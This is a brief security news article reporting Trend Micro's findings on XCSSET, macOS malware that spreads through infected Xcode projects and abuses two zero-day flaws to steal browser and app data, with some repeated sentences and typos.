XCSSET is a new malware that spreads through Xcode projects and exploits two zero-day vulnerabilitie to steal sensitive information from target systems.
XCSSET is a new malware that spreads through Xcode projects and exploits two zero-day vulnerabilitie to steal sensitive information from target systems.
The first zero-day issue used to steal cookies via a flaw in the behaviour of Data Vaults, while the second used to abuse the development version of Safari.
The malicious code is injected into local Xcode projects so that when the project is built, the malware gets executed. This creates a risk for Xcode developers. The initial entry of the threat to Xcode projects is still not clear.
Trend Micro has identified that the threat escalates when affected developers who share their prone ts on GitHub, potentially resulting in a supply-chain-like attack for users who rely on these repositories as dependencies in their projects.
Xcode is an integrated development environment (IDE) used in Mac OS for developing Apple-related software and apps. It is accessible for free from the Mac AppStore. This app built on top of the projects, automatically includes malicious code.
According to Trend Micro, the threat can steal a variety of user data associated with popular applications, including Evernote content, Skype, Notes, QQ, WeChat, and Telegram. The malware also permits attackers to capture screenshots and exfiltrate stolen documents to the command-and-control server. It also includes a ransomware module for file encryption and blackmail demand messages.
Trend Micro believes the UXSS element could also manipulate browser sessions to display malicious websites, change cryptocurrency wallet addresses, harvest Apple Store credit card information, and steal credentials from sources including Google, Yandex, Amocrm, Apple ID, Google, Paypal, and Yandex. It also prevents the user from changing passwords and also records new passwords.
"Affected developers will unwittingly distribute the malicious Trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files,” said Trend Micro.
For the latest cyber threats and the latest hacking news please follow us on Facebook, Linkedin, and Twitter.
You may be interested in reading: How to Survive the COVID Time Cyber Security Threats?